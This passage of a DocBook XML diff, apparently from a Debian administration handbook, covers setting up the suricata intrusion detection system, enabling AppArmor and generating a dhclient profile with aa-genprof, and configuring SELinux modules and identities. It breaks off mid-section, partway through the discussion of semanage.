+
+		</section>
+		 <section id="sect.intrusion-detection">
+			<title>Detecting Intrusion (IDS/NIDS)</title>
+			 <indexterm>
+				<primary>detection, intrusion</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>intrusion detection</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>IDS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>intrusion detection system</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>NIDS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Network</primary>
+				<secondary>IDS</secondary>
+			</indexterm>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Denial of service</title>
+			 <indexterm>
+				<primary>denial of service</primary>
+			</indexterm>
+			 <para>
+				A “denial of service” attack has only one goal: to make a service unavailable. Whether such an attack involves overloading the server with queries or exploiting a bug, the end result is the same: the service is no longer operational. Regular users are unhappy, and the entity hosting the targeted network service suffers a loss in reputation (and possibly in revenue, for instance if the service was an e-commerce site).
+			</para>
+			 <para>
+				Such an attack is sometimes “distributed”; this usually involves overloading the server with large numbers of queries coming from many different sources so that the server becomes unable to answer the legitimate queries. These types of attacks have gained well-known acronyms: <acronym>DDoS</acronym> and <acronym>DoS</acronym> (depending on whether the denial of service attack is distributed or not).
+			</para>
+			 </sidebar> <para>
+				<command>suricata</command> (in the Debian package of the same name) is a NIDS — a <emphasis>Network Intrusion Detection System</emphasis>. Its function is to listen to the network and try to detect infiltration attempts and/or hostile acts (including denial of service attacks). All these events are logged in multiple files in <filename>/var/log/suricata</filename>. There are third party tools (Kibana/logstash) to better browse all the data collected. <ulink type="block" url="http://suricata-ids.org" /> <ulink type="block" url="https://www.elastic.co/products/kibana" />
+			</para>
+			 <indexterm>
+				<primary><command>snort</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>suricata</command></primary>
+			</indexterm>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Range of action</title>
+			 <para>
+				The effectiveness of <command>suricata</command> is limited by the traffic seen on the monitored network interface. It will obviously not be able to detect anything if it cannot observe the real traffic. When plugged into a network switch, it will therefore only monitor attacks targeting the machine it runs on, which is probably not the intention. The machine hosting <command>suricata</command> should therefore be plugged into the “mirror” port of the switch, which is usually dedicated to chaining switches and therefore gets all the traffic.
+			</para>
+			 </sidebar> <para>
+				Configuring suricata involves reviewing and editing <filename>/etc/suricata/suricata-debian.yaml</filename>, which is very long because each parameter is abundantly commented. A minimal configuration requires describing the range of addresses that the local network covers (<literal>HOME_NET</literal> parameter). In practice, this means the set of all potential attack targets. But getting the most of it requires reading it in full and adapting it to the local situation.
+			</para>
+			 <para>
+				On top of this, you should also edit <filename>/etc/default/suricata</filename> to define the network interface to monitor and to enable the init script (by setting <literal>RUN=yes</literal>). You might also want to set <literal>LISTENMODE=pcap</literal> because the default <literal>LISTENMODE=nfqueue</literal> requires further configuration to work properly (the netfilter firewall must be configured to pass packets to some user-space queue handled by suricata via the <literal>NFQUEUE</literal> target).
+			</para>
+			 <para>
+				To detect bad behaviour, <command>suricata</command> needs a set of monitoring rules: you can find such rules in the <emphasis role="pkg">snort-rules-default</emphasis> package. <command>snort</command> is the historical reference in the IDS ecosystem and <command>suricata</command> is able to reuse rules written for it. Unfortunately that package is missing from <emphasis role="distribution">Debian Jessie</emphasis> and should be retrieved from another Debian release like <emphasis role="distribution">Testing</emphasis> or <emphasis role="distribution">Unstable</emphasis>.
+			</para>
+			 <para>
+				Alternatively, <command>oinkmaster</command> (in the package of the same name) can be used to download Snort rulesets from external sources.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Integration with <command>prelude</command></title>
+			 <para>
+				Prelude brings centralized monitoring of security information. Its modular architecture includes a server (the <emphasis>manager</emphasis> in <emphasis role="pkg">prelude-manager</emphasis>) which gathers alerts generated by <emphasis>sensors</emphasis> of various types.
+			</para>
+			 <para>
+				Suricata can be configured as such a sensor. Other possibilities include <emphasis>prelude-lml</emphasis> (<emphasis>Log Monitor Lackey</emphasis>) which monitors log files (in a manner similar to <command>logcheck</command>, described in <xref linkend="sect.logcheck" />).
+			</para>
+			 <indexterm>
+				<primary><command>prelude</command></primary>
+			</indexterm>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.apparmor">
+		<title>Introduction to AppArmor</title>
+		 <indexterm>
+			<primary>AppArmor</primary>
+		</indexterm>
+		 <section id="sect.apparmor-principles">
+			<title>Principles</title>
+			 <para>
+				AppArmor is a <emphasis>Mandatory Access Control</emphasis> (MAC) system built on Linux's LSM (<emphasis>Linux Security Modules</emphasis>) interface. In practice, the kernel queries AppArmor before each system call to know whether the process is authorized to do the given operation. Through this mechanism, AppArmor confines programs to a limited set of resources.
+			</para>
+			 <indexterm>
+				<primary><emphasis>Mandatory Access Control</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><emphasis>Linux Security Modules</emphasis></primary>
+			</indexterm>
+			 <para>
+				AppArmor applies a set of rules (known as “profile”) on each program. The profile applied by the kernel depends on the installation path of the program being executed. Contrary to SELinux (discussed in <xref linkend="sect.selinux" />), the rules applied do not depend on the user. All users face the same set of rules when they are executing the same program (but traditional user permissions still apply and might result in different behaviour!).
+			</para>
+			 <para>
+				AppArmor profiles are stored in <filename>/etc/apparmor.d/</filename> and they contain a list of access control rules on resources that each program can make use of. The profiles are compiled and loaded into the kernel by the <command>apparmor_parser</command> command. Each profile can be loaded either in enforcing or complaining mode. The former enforces the policy and reports violation attempts, while the latter does not enforce the policy but still logs the system calls that would have been denied.
+			</para>
+
+		</section>
+		 <section id="sect.apparmor-setup">
+			<title>Enabling AppArmor and managing AppArmor profiles</title>
+			 <para>
+				AppArmor support is built into the standard kernels provided by Debian. Enabling AppArmor is thus just a matter of installing a few packages and adding some parameters to the kernel command line:
+			</para>
+			 
+<screen><computeroutput># </computeroutput><userinput>apt install apparmor apparmor-profiles apparmor-utils
+</userinput><computeroutput>[...]
+# </computeroutput><userinput>perl -pi -e 's,GRUB_CMDLINE_LINUX="(.*)"$,GRUB_CMDLINE_LINUX="$1 apparmor=1 security=apparmor",' /etc/default/grub
+</userinput><computeroutput># </computeroutput><userinput>update-grub
+</userinput></screen>
+			 <para>
+				After a reboot, AppArmor is now functional and <command>aa-status</command> will confirm it quickly:
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>aa-status</userinput>
+<computeroutput>apparmor module is loaded.
+44 profiles are loaded.
+9 profiles are in enforce mode.
+   /usr/bin/lxc-start
+   /usr/lib/chromium-browser/chromium-browser//browser_java
+[...]
+35 profiles are in complain mode.
+   /sbin/klogd
+[...]
+3 processes have profiles defined.
+1 processes are in enforce mode.
+   /usr/sbin/libvirtd (1295) 
+2 processes are in complain mode.
+   /usr/sbin/avahi-daemon (941) 
+   /usr/sbin/avahi-daemon (1000) 
+0 processes are unconfined but have a profile defined.</computeroutput></screen>
+			 <sidebar> <title><emphasis>NOTE</emphasis> More AppArmor profiles</title>
+			 <para>
+				The <emphasis role="pkg">apparmor-profiles</emphasis> package contains profiles managed by the upstream AppArmor community. To get even more profiles you can install <emphasis role="pkg">apparmor-profiles-extra</emphasis> which contains profiles developed by Ubuntu and Debian.
+			</para>
+			 </sidebar> <para>
+				The state of each profile can be switched between enforcing and complaining with calls to <command>aa-enforce</command> and <command>aa-complain</command> giving as parameter either the path of the executable or the path to the policy file. Additionaly a profile can be entirely disabled with <command>aa-disable</command> or put in audit mode (to log accepted system calls too) with <command>aa-audit</command>.
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>aa-enforce /usr/sbin/avahi-daemon</userinput>
+<computeroutput>Setting /usr/sbin/avahi-daemon to enforce mode.</computeroutput>
+<computeroutput># </computeroutput><userinput>aa-complain /etc/apparmor.d/usr.bin.lxc-start</userinput>
+<computeroutput>Setting /etc/apparmor.d/usr.bin.lxc-start to complain mode.</computeroutput>
+</screen>
+
+		</section>
+		 <section id="sect.apparmor-new-profile">
+			<title>Creating a new profile</title>
+			 <para>
+				Even though creating an AppArmor profile is rather easy, most programs do not have one. This section will show you how to create a new profile from scratch just by using the target program and letting AppArmor monitor the system call it makes and the resources it accesses.
+			</para>
+			 <para>
+				The most important programs that need to be confined are the network facing programs as those are the most likely targets of remote attackers. That is why AppArmor conveniently provides an <command>aa-unconfined</command> command to list the programs which have no associated profile and which expose an open network socket. With the <literal>--paranoid</literal> option you get all unconfined processes that have at least one active network connection.
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>aa-unconfined</userinput>
+<computeroutput>801 /sbin/dhclient not confined
+890 /sbin/rpcbind not confined
+899 /sbin/rpc.statd not confined
+929 /usr/sbin/sshd not confined
+941 /usr/sbin/avahi-daemon confined by '/usr/sbin/avahi-daemon (complain)'
+988 /usr/sbin/minissdpd not confined
+1276 /usr/sbin/exim4 not confined
+1485 /usr/lib/erlang/erts-6.2/bin/epmd not confined
+1751 /usr/lib/erlang/erts-6.2/bin/beam.smp not confined
+19592 /usr/lib/dleyna-renderer/dleyna-renderer-service not confined</computeroutput>
+</screen>
+			 <para>
+				In the following example, we will thus try to create a profile for <command>/sbin/dhclient</command>. For this we will use <command>aa-genprof dhclient</command>. It will invite you to use the application in another window and when done to come back to <command>aa-genprof</command> to scan for AppArmor events in the system logs and convert those logs into access rules. For each logged event, it will make one or more rule suggestions that you can either approve or further edit in multiple ways:
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>aa-genprof dhclient</userinput>
+<computeroutput>Writing updated profile for /sbin/dhclient.
+Setting /sbin/dhclient to complain mode.
+
+Before you begin, you may wish to check if a
+profile already exists for the application you
+wish to confine. See the following wiki page for
+more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Please start the application to be profiled in
+another window and exercise its functionality now.
+
+Once completed, select the "Scan" option below in 
+order to scan the system logs for AppArmor events. 
+
+For each AppArmor event, you will be given the 
+opportunity to choose whether the access should be 
+allowed or denied.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+Reading log entries from /var/log/audit/audit.log.
+
+Profile:  /sbin/dhclient <co id="aa-genprof-execute"></co>
+Execute:  /usr/lib/NetworkManager/nm-dhcp-helper
+Severity: unknown
+
+(I)nherit / (C)hild / (P)rofile / (N)amed / (U)nconfined / (X) ix On / (D)eny / Abo(r)t / (F)inish
+<userinput>P</userinput>
+Should AppArmor sanitise the environment when
+switching profiles?
+
+Sanitising environment is more secure,
+but some applications depend on the presence
+of LD_PRELOAD or LD_LIBRARY_PATH.
+
+(Y)es / [(N)o]
+<userinput>Y</userinput>
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+Complain-mode changes:
+WARN: unknown capability: CAP_net_raw
+
+Profile:    /sbin/dhclient <co id="aa-genprof-capability"></co>
+Capability: net_raw
+Severity:   unknown
+
+[(A)llow] / (D)eny / (I)gnore / Audi(t) / Abo(r)t / (F)inish
+<userinput>A</userinput>
+Adding capability net_raw to profile.
+
+Profile:  /sbin/dhclient <co id="aa-genprof-read"></co>
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+  3 - #include &lt;abstractions/nameservice&gt; 
+  4 - #include &lt;abstractions/totem&gt; 
+ [5 - /etc/nsswitch.conf]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>3</userinput>
+
+Profile:  /sbin/dhclient
+Path:     /etc/nsswitch.conf
+Mode:     r
+Severity: unknown
+
+  1 - #include &lt;abstractions/apache2-common&gt; 
+  2 - #include &lt;abstractions/libvirt-qemu&gt; 
+ [3 - #include &lt;abstractions/nameservice&gt;]
+  4 - #include &lt;abstractions/totem&gt; 
+  5 - /etc/nsswitch.conf 
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding #include &lt;abstractions/nameservice&gt; to profile.
+
+Profile:  /sbin/dhclient
+Path:     /proc/7252/net/dev
+Mode:     r
+Severity: 6
+
+  1 - /proc/7252/net/dev 
+ [2 - /proc/*/net/dev]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding /proc/*/net/dev r to profile
+
+[...]
+Profile:  /sbin/dhclient <co id="aa-genprof-write"></co>
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+ [1 - /run/dhclient-eth0.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>N</userinput>
+
+Enter new path: /run/dhclient*.pid
+
+Profile:  /sbin/dhclient
+Path:     /run/dhclient-eth0.pid
+Mode:     w
+Severity: unknown
+
+  1 - /run/dhclient-eth0.pid 
+ [2 - /run/dhclient*.pid]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding /run/dhclient*.pid w to profile
+
+[...]
+Profile:  /usr/lib/NetworkManager/nm-dhcp-helper <co id="aa-genprof-other-profile"></co>
+Path:     /proc/filesystems
+Mode:     r
+Severity: 6
+
+ [1 - /proc/filesystems]
+[(A)llow] / (D)eny / (I)gnore / (G)lob / Glob with (E)xtension / (N)ew / Abo(r)t / (F)inish / (M)ore
+<userinput>A</userinput>
+Adding /proc/filesystems r to profile
+
+= Changed Local Profiles =
+
+The following local profiles were changed. Would you like to save them?
+
+ [1 - /sbin/dhclient]
+  2 - /usr/lib/NetworkManager/nm-dhcp-helper 
+(S)ave Changes / Save Selec(t)ed Profile / [(V)iew Changes] / View Changes b/w (C)lean profiles / Abo(r)t
+<userinput>S</userinput>
+Writing updated profile for /sbin/dhclient.
+Writing updated profile for /usr/lib/NetworkManager/nm-dhcp-helper.
+
+Profiling: /sbin/dhclient
+
+[(S)can system log for AppArmor events] / (F)inish
+<userinput>F</userinput>
+Setting /sbin/dhclient to enforce mode.
+Setting /usr/lib/NetworkManager/nm-dhcp-helper to enforce mode.
+
+Reloaded AppArmor profiles in enforce mode.
+
+Please consider contributing your new profile!
+See the following wiki page for more information:
+http://wiki.apparmor.net/index.php/Profiles
+
+Finished generating profile for /sbin/dhclient.</computeroutput></screen>
+			 <para>
+				Note that the program does not display back the control characters that you type but for the clarity of the explanation I have included them in the previous transcript.
+			</para>
+			 <calloutlist>
+				<callout arearefs="aa-genprof-execute">
+					<para>
+						The first event detected is the execution of another program. In that case, you have multiple choices: you can run the program with the profile of the parent process (the “Inherit” choice), you can run it with its own dedicated profile (the “Profile” and the “Named” choices, differing only by the possibility to use an arbitrary profile name), you can run it with a sub-profile of the parent process (the “Child” choice), you can run it without any profile (the “Unconfined” choice) or you can decide to not run it at all (the “Deny” choice).
+					</para>
+					 <para>
+						Note that when you opt to run it under a dedicated profile that doesn't exist yet, the tool will create the missing profile for you and will make rule suggestions for that profile in the same run.
+					</para>
+
+				</callout>
+				 <callout arearefs="aa-genprof-capability">
+					<para>
+						At the kernel level, the special powers of the root user have been split in “capabilities”. When a system call requires a specific capability, AppArmor will verify whether the profile allows the program to make use of this capability.
+					</para>
+
+				</callout>
+				 <callout arearefs="aa-genprof-read">
+					<para>
+						Here the program seeks read permissions for <filename>/etc/nsswitch.conf</filename>. <command>aa-genprof</command> detected that this permission was also granted by multiple “abstractions” and offers them as alternative choices. An abstraction provides a reusable set of access rules grouping together multiple resources that are commonly used together. In this specific case, the file is generally accessed through the nameservice related functions of the C library and we type “3” to first select the “#include &lt;abstractions/nameservice&gt;” choice and then “A” to allow it.
+					</para>
+
+				</callout>
+				 <callout arearefs="aa-genprof-write">
+					<para>
+						The program wants to create the <filename>/run/dhclient-eth0.pid</filename> file. If we allow the creation of this specific file only, the program will not work when the user will use it on another network interface. Thus we select “New” to replace the filename with the more generic “/run/dhclient*.pid” before recording the rule with “Allow”.
+					</para>
+
+				</callout>
+				 <callout arearefs="aa-genprof-other-profile">
+					<para>
+						Notice that this access request is not part of the dhclient profile but of the new profile that we created when we allowed <filename>/usr/lib/NetworkManager/nm-dhcp-helper</filename> to run with its own profile.
+					</para>
+					 <para>
+						After having gone through all the logged events, the program offers to save all the profiles that were created during the run. In this case, we have two profiles that we save at once with “Save” (but you can save them individually too) before leaving the program with “Finish”.
+					</para>
+
+				</callout>
+
+			</calloutlist>
+			 <para>
+				<command>aa-genprof</command> is in fact only a smart wrapper around <command>aa-logprof</command>: it creates an empty profile, loads it in complain mode and then run <command>aa-logprof</command> which is a tool to update a profile based on the profile violations that have been logged. So you can re-run that tool later to improve the profile that you just created.
+			</para>
+			 <para>
+				If you want the generated profile to be complete, you should use the program in all the ways that it is legitimately used. In the case of dhclient, it means running it via Network Manager, running it via ifupdown, running it manually, etc. In the end, you might get a <filename>/etc/apparmor.d/sbin.dhclient</filename> close to this:
+			</para>
+			 
+<programlisting>
+# Last Modified: Tue Sep  8 21:40:02 2015
+#include &lt;tunables/global&gt;
+
+/sbin/dhclient {
+  #include &lt;abstractions/base&gt;
+  #include &lt;abstractions/nameservice&gt;
+
+  capability net_bind_service,
+  capability net_raw,
+
+  /bin/dash r,
+  /etc/dhcp/* r,
+  /etc/dhcp/dhclient-enter-hooks.d/* r,
+  /etc/dhcp/dhclient-exit-hooks.d/* r,
+  /etc/resolv.conf.* w,
+  /etc/samba/dhcp.conf.* w,
+  /proc/*/net/dev r,
+  /proc/filesystems r,
+  /run/dhclient*.pid w,
+  /sbin/dhclient mr,
+  /sbin/dhclient-script rCx,
+  /usr/lib/NetworkManager/nm-dhcp-helper Px,
+  /var/lib/NetworkManager/* r,
+  /var/lib/NetworkManager/*.lease rw,
+  /var/lib/dhcp/*.leases rw,
+
+  profile /sbin/dhclient-script flags=(complain) {
+    #include &lt;abstractions/base&gt;
+    #include &lt;abstractions/bash&gt;
+
+    /bin/dash rix,
+    /etc/dhcp/dhclient-enter-hooks.d/* r,
+    /etc/dhcp/dhclient-exit-hooks.d/* r,
+    /sbin/dhclient-script r,
+
+  }
+}
+</programlisting>
+
+		</section>
+
+	</section>
+	 <section id="sect.selinux">
+		<title>Introduction to SELinux</title>
+		 <indexterm>
+			<primary>SELinux</primary>
+		</indexterm>
+		 <section id="sect.selinux-principles">
+			<title>Principles</title>
+			 <para>
+				SELinux (<emphasis>Security Enhanced Linux</emphasis>) is a <emphasis>Mandatory Access Control</emphasis> system built on Linux's LSM (<emphasis>Linux Security Modules</emphasis>) interface. In practice, the kernel queries SELinux before each system call to know whether the process is authorized to do the given operation.
+			</para>
+			 <para>
+				SELinux uses a set of rules — collectively known as a <emphasis>policy</emphasis> — to authorize or forbid operations. Those rules are difficult to create. Fortunately, two standard policies (<emphasis>targeted</emphasis> and <emphasis>strict</emphasis>) are provided to avoid the bulk of the configuration work.
+			</para>
+			 <para>
+				With SELinux, the management of rights is completely different from traditional Unix systems. The rights of a process depend on its <emphasis>security context</emphasis>. The context is defined by the <emphasis>identity</emphasis> of the user who started the process, the <emphasis>role</emphasis> and the <emphasis>domain</emphasis> that the user carried at that time. The rights really depend on the domain, but the transitions between domains are controlled by the roles. Finally, the possible transitions between roles depend on the identity.
+			</para>
+			 <figure>
+				<title>Security contexts and Unix users</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/selinux-context.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				In practice, during login, the user gets assigned a default security context (depending on the roles that they should be able to endorse). This defines the current domain, and thus the domain that all new child processes will carry. If you want to change the current role and its associated domain, you must call <command>newrole -r <replaceable>role_r</replaceable> -t <replaceable>domain_t</replaceable></command> (there's usually only a single domain allowed for a given role, the <literal>-t</literal> parameter can thus often be left out). This command authenticates you by asking you to type your password. This feature forbids programs to automatically switch roles. Such changes can only happen if they are explicitly allowed in the SELinux policy.
+			</para>
+			 <para>
+				Obviously the rights do not apply to all <emphasis>objects</emphasis> (files, directories, sockets, devices, etc.). They can vary from object to object. To achieve this, each object is associated to a <emphasis>type</emphasis> (this is known as labeling). Domains' rights are thus expressed with sets of (dis)allowed operations on those types (and, indirectly, on all objects which are labeled with the given type).
+			</para>
+			 <sidebar> <title><emphasis>EXTRA</emphasis> Domains and types are equivalent</title>
+			 <para>
+				Internally, a domain is just a type, but a type that only applies to processes. That's why domains are suffixed with <literal>_t</literal> just like objects' types.
+			</para>
+			 </sidebar> <para>
+				By default, a program inherits its domain from the user who started it, but the standard SELinux policies expect many important programs to run in dedicated domains. To achieve this, those executables are labeled with a dedicated type (for example <command>ssh</command> is labeled with <literal>ssh_exec_t</literal>, and when the program starts, it automatically switches to the <literal>ssh_t</literal> domain). This automatic domain transition mechanism makes it possible to grant only the rights required by each program. It is a fundamental principle of SELinux.
+			</para>
+			 <figure>
+				<title>Automatic transitions between domains</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/selinux-transitions.png" format="PNG" scalefit="1" width="35%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Finding the security context</title>
+			 <indexterm>
+				<primary>security context</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>context, security context</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>MCS (<emphasis>Multi-Category Security</emphasis>)</primary>
+			</indexterm>
+			 <para>
+				To find the security context of a given process, you should use the <literal>Z</literal> option of <command>ps</command>.
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>ps axZ | grep vstfpd</userinput>
+<computeroutput>system_u:system_r:ftpd_t:s0   2094 ?    Ss  0:00 /usr/sbin/vsftpd</computeroutput></screen>
+			 <para>
+				The first field contains the identity, the role, the domain and the MCS level, separated by colons. The MCS level (<emphasis>Multi-Category Security</emphasis>) is a parameter that intervenes in the setup of a confidentiality protection policy, which regulates the access to files based on their sensitivity. This feature will not be explained in this book.
+			</para>
+			 <para>
+				To find the current security context in a shell, you should call <command>id -Z</command>.
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>id -Z</userinput>
+<computeroutput>unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023</computeroutput></screen>
+			 <para>
+				Finally, to find the type assigned to a file, you can use <command>ls -Z</command>.
+			</para>
+			 
+<screen><computeroutput>$ </computeroutput><userinput>ls -Z test /usr/bin/ssh</userinput>
+<computeroutput>unconfined_u:object_r:user_home_t:s0 test
+     system_u:object_r:ssh_exec_t:s0 /usr/bin/ssh</computeroutput></screen>
+			 <para>
+				It is worth noting that the identity and role assigned to a file bear no special importance (they are never used), but for the sake of uniformity, all objects get assigned a complete security context.
+			</para>
+			 </sidebar>
+		</section>
+		 <section id="sect.selinux-setup">
+			<title>Setting Up SELinux</title>
+			 <para>
+				SELinux support is built into the standard kernels provided by Debian. The core Unix tools support SELinux without any modifications. It is thus relatively easy to enable SELinux.
+			</para>
+			 <para>
+				The <command>apt install selinux-basics selinux-policy-default</command> command will automatically install the packages required to configure an SELinux system.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Reference policy not in jessie</title>
+			 <para>
+				Unfortunately the maintainers of the <emphasis role="pkg">refpolicy</emphasis> source package did not handle release critical bugs on their package and the package got removed from jessie. This means that the <emphasis role="pkg">selinux-policy-*</emphasis> packages are currently not installable in jessie and need to be fetched from another place. Hopefully they will come back in one of the point releases or in jessie-backports. In the meantime, you can grab them from unstable.
+			</para>
+			 <para>
+				This sad situation at least proves that SELinux is not very popular in the set of users/developers who are running the development versions of Debian. Thus, if you opt to use SELinux, you should expect the default policy to not work perfectly and you will have to invest quite some time to make it suitable to your specific needs.
+			</para>
+			 </sidebar> <para>
+				The <emphasis role="pkg">selinux-policy-default</emphasis> package contains a set of standard rules. By default, this policy only restricts access for a few widely exposed services. The user sessions are not restricted and it is thus unlikely that SELinux would block legitimate user operations. However, this does enhance the security of system services running on the machine. To setup a policy equivalent to the old “strict” rules, you just have to disable the <literal>unconfined</literal> module (modules management is detailed further in this section).
+			</para>
+			 <para>
+				Once the policy has been installed, you should label all the available files (which means assigning them a type). This operation must be manually started with <command>fixfiles relabel</command>.
+			</para>
+			 <para>
+				The SELinux system is now ready. To enable it, you should add the <literal>selinux=1 security=selinux</literal> parameter to the Linux kernel. The <literal>audit=1</literal> parameter enables SELinux logging which records all the denied operations. Finally, the <literal>enforcing=1</literal> parameter brings the rules into application: without it SELinux works in its default <emphasis>permissive</emphasis> mode where denied actions are logged but still executed. You should thus modify the GRUB bootloader configuration file to append the desired parameters. One easy way to do this is to modify the <literal>GRUB_CMDLINE_LINUX</literal> variable in <filename>/etc/default/grub</filename> and to run <command>update-grub</command>. SELinux will be active after a reboot.
+			</para>
+			 <para>
+				It is worth noting that the <command>selinux-activate</command> script automates those operations and forces a labeling on next boot (which avoids new non-labeled files created while SELinux was not yet active and while the labeling was going on).
+			</para>
+
+		</section>
+		 <section id="sect.selinux-management">
+			<title>Managing an SELinux System</title>
+			 <indexterm>
+				<primary><command>semodule</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>semanage</command></primary>
+			</indexterm>
+			 <para>
+				The SELinux policy is a modular set of rules, and its installation detects and enables automatically all the relevant modules based on the already installed services. The system is thus immediately operational. However, when a service is installed after the SELinux policy, you must be able to manually enable the corresponding module. That is the purpose of the <command>semodule</command> command. Furthermore, you must be able to define the roles that each user can endorse, and this can be done with the <command>semanage</command> command.
+			</para>
+			 <para>
+				Those two commands can thus be used to modify the current SELinux configuration, which is stored in <filename>/etc/selinux/default/</filename>. Unlike other configuration files that you can find in <filename>/etc/</filename>, all those files must not be changed by hand. You should use the programs designed for this purpose.
+			</para>
+			 <sidebar> <title><emphasis>GOING FURTHER</emphasis> More documentation</title>
+			 <para>
+				Since the NSA doesn't provide any official documentation, the community set up a wiki to compensate. It brings together a lot of information, but you must be aware that most SELinux contributors are Fedora users (where SELinux is enabled by default). The documentation thus tends to deal specifically with that distribution. <ulink type="block" url="http://www.selinuxproject.org" />
+			</para>
+			 <para>
+				You should also have a look at the dedicated Debian wiki page as well as Russell Coker's blog, who is one of the most active Debian developers working on SELinux support. <ulink type="block" url="http://wiki.debian.org/SELinux" /> <ulink type="block" url="http://etbe.coker.com.au/tag/selinux/" />
+			</para>
+			 </sidebar> <section>
+				<title>Managing SELinux Modules</title>
+				 <para>
+					Available SELinux modules are stored in the <filename>/usr/share/selinux/default/</filename> directory. To enable one of these modules in the current configuration, you should use <command>semodule -i <replaceable>module.pp.bz2</replaceable></command>. The <emphasis>pp.bz2</emphasis> extension stands for <emphasis>policy package</emphasis> (compressed with bzip2).
+				</para>
+				 <para>
+					Removing a module from the current configuration is done with <command>semodule -r <replaceable>module</replaceable></command>. Finally, the <command>semodule -l</command> command lists the modules which are currently installed. It also outputs their version numbers. Modules can be selectively enabled with <command>semodule -e</command> and disabled with <command>semodule -d</command>.
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>semodule -i /usr/share/selinux/default/abrt.pp.bz2</userinput>
+<computeroutput># </computeroutput><userinput>semodule -l</userinput>
+<computeroutput>abrt    1.5.0   Disabled
+accountsd       1.1.0   
+acct    1.6.0   
+[...]</computeroutput>
+<computeroutput># </computeroutput><userinput>semodule -e abrt</userinput>
+<computeroutput># </computeroutput><userinput>semodule -d accountsd</userinput>
+<computeroutput># </computeroutput><userinput>semodule -l</userinput>
+<computeroutput>abrt    1.5.0
+accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</computeroutput>
+<computeroutput># </computeroutput><userinput>semodule -r abrt</userinput>
+<computeroutput># </computeroutput><userinput>semodule -l</userinput>
+<computeroutput>accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</computeroutput></screen>
+				 <para>
+					<command>semodule</command> immediately loads the new configuration unless you use its <literal>-n</literal> option. It is worth noting that the program acts by default on the current configuration (which is indicated by the <literal>SELINUXTYPE</literal> variable in <filename>/etc/selinux/config</filename>), but that you can modify another one by specifying it with the <literal>-s</literal> option.
+				</para>
+
+			</section>
+			 <section>
+				<title>Managing Identities</title>
+				 <para>
+					Every time that a user logs in, they get assigned an SELinux identity. This identity defines the roles that they will be able to endorse. Those two mappings (from the user to the identity and from this identity to roles) are configurable with the <command>semanage</command> command.
+				</para>
+				 <para>
+					You should definitely read the <citerefentry><refentrytitle>semanage</refentrytitle>
+					<manvolnum>8</manvolnum></citerefentry> manual page, even if the command's syntax tends to be similar for all the concepts which are managed. You will find common options to all sub-commands: <literal>-a</literal> to add, <literal>-d</literal> to delete, <literal>-m</literal> to modify, <literal>-l</literal> to list, and <literal>-t</literal> to indicate a type (or domain).
+				</para>
+				 <para>
+					<command>semanage login -l</command> lists the current mapping between user identifiers and SELinux identities. Users that have no explicit entry get the identity indicated in the <literal>__default__</literal> entry. The <command>semanage login -a -s user_u <replaceable>user</replaceable></command> command will associate the <emphasis>user_u</emphasis> identity to the given user. Finally, <command>semanage login -d <replaceable>user</replaceable></command> drops the mapping entry assigned to this user.
+				</para>
+				 
+<screen><computeroutput># </computeroutput><userinput>semanage login -a -s user_u rhertzog</userinput>
+<computeroutput># </computeroutput><userinput>semanage login -l</userinput>
+<computeroutput>
+Login Name           SELinux User         MLS/MCS Range        Service
+
+__default__          unconfined_u         SystemLow-SystemHigh *
+rhertzog             user_u               SystemLow            *
+root                 unconfined_u         SystemLow-SystemHigh *
+system_u             system_u             SystemLow-SystemHigh *
+# </computeroutput><userinput>semanage login -d rhertzog</userinput></screen>
+				 <para>
